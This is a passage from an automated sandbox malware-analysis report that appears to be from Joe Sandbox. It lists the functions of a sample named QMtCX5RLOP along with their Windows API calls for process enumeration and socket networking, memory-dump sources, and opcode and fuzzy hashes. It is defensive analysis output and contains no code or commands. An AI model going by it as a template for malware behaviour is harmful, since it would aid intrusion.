                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 181ddc13e0918c722587ac4bf74773a389fa9be05fcb75f2bd6104de5016d3de
                                                            • Instruction ID: 7623e62c50666b8d23cf72c36106bfca5fc7c356a8b9a1490596b0a0de39d716
                                                            • Opcode Fuzzy Hash: 181ddc13e0918c722587ac4bf74773a389fa9be05fcb75f2bd6104de5016d3de
                                                            • Instruction Fuzzy Hash: D541F2E710C321BDBB82C5456E50DFA2B6EEFD6330370952FF807C6942E2940A8A55B2
                                                            Function 06E903B9 Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ba210c5dd0502d531e0852608f22b96b0aad8533fdf6976b743b3c44155f781f
                                                            • Instruction ID: c20c2096629c9093ab6a2765237d3be582372cb53ee76c8870a4d7f93b4e9d2b
                                                            • Opcode Fuzzy Hash: ba210c5dd0502d531e0852608f22b96b0aad8533fdf6976b743b3c44155f781f
                                                            • Instruction Fuzzy Hash: 6141A2E710C321BCBBD284456B549FA176EEEE6730370A52FF807C5942E2940E8A54B2
                                                            Function 06EA02B5 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 6ca47bf90b2af5fe5b168a87292b08e517b540ad66968e2c4fa3ed4480c3606c
                                                            • Instruction ID: 59b40d3fb40571066bb2f7a09854d01c88f2f96ca231022b47be80f3e25da81e
                                                            • Opcode Fuzzy Hash: 6ca47bf90b2af5fe5b168a87292b08e517b540ad66968e2c4fa3ed4480c3606c
                                                            • Instruction Fuzzy Hash: 8A3181F714C321BDB3D285456F68AFB576EE6D6738730A426F443CE542E3886A4E10B1
                                                            Function 00DF4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • gethostname.WS2_32(00000000,00000040), ref: 00DF4AA5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: gethostname
                                                            • String ID:
                                                            • API String ID: 144339138-0
                                                            • Opcode ID: 5408350fce44240d4f17c542397a3c10c6ef11931c6767e1046a8f06421a2f95
                                                            • Instruction ID: fe8a6b1ba0e770e8ab53d055a5bcdf0137a374299f29286262773c2061fa85d7
                                                            • Opcode Fuzzy Hash: 5408350fce44240d4f17c542397a3c10c6ef11931c6767e1046a8f06421a2f95
                                                            • Instruction Fuzzy Hash: 8151D4706043089BE7319F25D94973376D4EF40318F0A893DDB8A866D2E7B4E884CB32
                                                            Function 06EA03B4 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 25ae8642f3353dbc20a1b48b570dfa38fd4e61cbcd00dd3175aca96962c3679b
                                                            • Instruction ID: dbd23c8056b488f7eb914ea933d14688c7c22428db12054e1c25a40aa6fc1365
                                                            • Opcode Fuzzy Hash: 25ae8642f3353dbc20a1b48b570dfa38fd4e61cbcd00dd3175aca96962c3679b
                                                            • Instruction Fuzzy Hash: B4314DF714C361BDB3D280452F24AFA1B2EE5E6738731E52AF443CE542E2892A4E11B1
                                                            Function 06EA03E4 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 4490918f1dec93a7ed0c9b9b4754d110de1f07852f885cde8b4b5e72fc0bd777
                                                            • Instruction ID: 69a81f5e52e8fe80c4bfccfd364355a009de0d1e8e931bf8fccdebd847524534
                                                            • Opcode Fuzzy Hash: 4490918f1dec93a7ed0c9b9b4754d110de1f07852f885cde8b4b5e72fc0bd777
                                                            • Instruction Fuzzy Hash: D831A0F718C321BD73D285556F24AFB1B1EE5D6738331A52AF443CE542E2896A4E10F1
                                                            Function 06EA03AB Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: de51fe397bd4cba0976493ae1ad7c44beced2feb296ed5f42b9ec4c8f8759c7b
                                                            • Instruction ID: 06f94d5cdb5599eef33cbd2c4d68a621bfe231e14bbca97282309a7e34e01b26
                                                            • Opcode Fuzzy Hash: de51fe397bd4cba0976493ae1ad7c44beced2feb296ed5f42b9ec4c8f8759c7b
                                                            • Instruction Fuzzy Hash: 71212DF714C321BD73D284452F24AFB071EE5E6738731E52AF847CE942E2896A8E10B1
                                                            Function 06EA03C6 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: f13960ce050fd1b52e191c35434204b5022a7f23d89f6e765b1d7241a1b6d57e
                                                            • Instruction ID: 568f23d118bfd9207fa4de5405d9e57c5d04eb5d60753e373eddec68a0bdd0c3
                                                            • Opcode Fuzzy Hash: f13960ce050fd1b52e191c35434204b5022a7f23d89f6e765b1d7241a1b6d57e
                                                            • Instruction Fuzzy Hash: D22130F714C321BD73D284452F24AFB471EE5E6738731E42AF807CE542E2896B4A10B1
                                                            Function 06EA0419 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 2debf5f07f14b6ec5b441f7924cdcf79d2c026879848aad298ad57874a83346d
                                                            • Instruction ID: f43c8c304d34a0b46478a80d5b2042086a1d26d54a10e19d9d6e908f117600d0
                                                            • Opcode Fuzzy Hash: 2debf5f07f14b6ec5b441f7924cdcf79d2c026879848aad298ad57874a83346d
                                                            • Instruction Fuzzy Hash: 52212CF714C321BD73D684556F24AFB171EE5E6738731E42AF447CE942E2887A8A10B1
                                                            Function 06EA03FB Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 84414becb9730a511a2a44f21295f8fa073267b1cff4cb1b97e0eb56fa608027
                                                            • Instruction ID: c8373c9a7ab8730b8b38a3a909fca268b3b0b10c4c9f5800ad7d8f0994a710f4
                                                            • Opcode Fuzzy Hash: 84414becb9730a511a2a44f21295f8fa073267b1cff4cb1b97e0eb56fa608027
                                                            • Instruction Fuzzy Hash: DE21B2F714C311BDB3D284552F24AFB172EE6E6738731E52AF443CE542E2846A4A10B0
                                                            Function 00E0AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00E0AFD1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID:
                                                            • API String ID: 3358416759-0
                                                            • Opcode ID: 92320ebed1d64c3d946c9d2bf204d386c62bf24f47c11055b25e8f87e44a45ae
                                                            • Instruction ID: 74ca10e7c1e013e9a30e4280b63ca266c3651fdc4c4f35a747bbf24a30f06f04
                                                            • Opcode Fuzzy Hash: 92320ebed1d64c3d946c9d2bf204d386c62bf24f47c11055b25e8f87e44a45ae
                                                            • Instruction Fuzzy Hash: C1119670908785D5EB268F18D4027F6B3F4EFD0329F109A18E5D952150F7329AC58BC2
                                                            Function 00E0A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00E0A97F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID:
                                                            • API String ID: 2809346765-0
                                                            • Opcode ID: e05225aa93d916a7ef826c9f466396814bbacb619d987b81eb926d4f8a5dde9a
                                                            • Instruction ID: f509c2195157812fc29c7f39197df301cab9014f2dd0fdceeb6a70fa9f1890a8
                                                            • Opcode Fuzzy Hash: e05225aa93d916a7ef826c9f466396814bbacb619d987b81eb926d4f8a5dde9a
                                                            • Instruction Fuzzy Hash: 8E01A771B007149FD6148F14E845B56B7A5EFC4720F4A8559E9982B3A1C331AC508BE1
                                                            Function 00E0A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00DF712E,?,?,?,00001001,00000000), ref: 00E0A90D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: recvfrom
                                                            • String ID:
                                                            • API String ID: 846543921-0
                                                            • Opcode ID: e4c976dbec10f5a779df5af2c5fee330e3ca27409be9ae36175e22a66dfa5b8f
                                                            • Instruction ID: a5336b541b29e41b42e9e4c57f566690442548b731e54818b73e34996dd7499b
                                                            • Opcode Fuzzy Hash: e4c976dbec10f5a779df5af2c5fee330e3ca27409be9ae36175e22a66dfa5b8f
                                                            • Instruction Fuzzy Hash: 5EF06D7520830CAFD2109F41EC44DABBBEDEFC9758F05456DF948232118270AE10CAB2
                                                            Function 00E0AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WS2_32(?,00E0B280,00000000,-00000001,00000000,00E0B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00E0AF66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID:
                                                            • API String ID: 98920635-0
                                                            • Opcode ID: f1c4819cc9b8e92058889b4a200eb0197ea1145d2ceddb9e1c217e64d0a4beb9
                                                            • Instruction ID: 82ea73dcb8f2e37ba2ddca3d4a79a194e80cfe5c079dcd9ed5602cfa5212e1e0
                                                            • Opcode Fuzzy Hash: f1c4819cc9b8e92058889b4a200eb0197ea1145d2ceddb9e1c217e64d0a4beb9
                                                            • Instruction Fuzzy Hash: 0BE0EDB2B053226BD6649E58E8449ABF3A9EFC4B20F095A59BC5467204C330AC5087E2
                                                            Function 00E0B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • closesocket.WS2_32(?,00E09422,?,?,?,?,?,?,?,?,?,?,?,00DF3377,011D4C60,00000000), ref: 00E0B04C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID:
                                                            • API String ID: 2781271927-0
                                                            • Opcode ID: 2712299a13fbb0c727ee1e5bda753324727844c719bd82bf8c8589799c5ca0ed
                                                            • Instruction ID: c7d0b3adcf67e38a8fb8a68e2286db8a075949eaf080075ccb760504b5d57fea
                                                            • Opcode Fuzzy Hash: 2712299a13fbb0c727ee1e5bda753324727844c719bd82bf8c8589799c5ca0ed
                                                            • Instruction Fuzzy Hash: 2ED0C7B070020097CA208A28C884A4B732BBFC0718F28CB68E42C5A190DB3BCC838602
                                                            Function 00DA67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ioctlsocket.WS2_32(?,8004667E,?,?,00D7AF56,?,00000001), ref: 00DA67FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocket
                                                            • String ID:
                                                            • API String ID: 3577187118-0
                                                            • Opcode ID: 3b232f17fb98f90d4ba5261481abb6d40a01cdc00eaadcb964418ba661033994
                                                            • Instruction ID: b1655764e4dcdbc3f01eeb42c5cdaf68e392172bccfb74209a509df258ccb336
                                                            • Opcode Fuzzy Hash: 3b232f17fb98f90d4ba5261481abb6d40a01cdc00eaadcb964418ba661033994
                                                            • Instruction Fuzzy Hash: 9DC080F121C101BFD70C8714D455B2F77E8DB84355F01581CB086D1180FA345990CF17
                                                            Function 010CB180 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
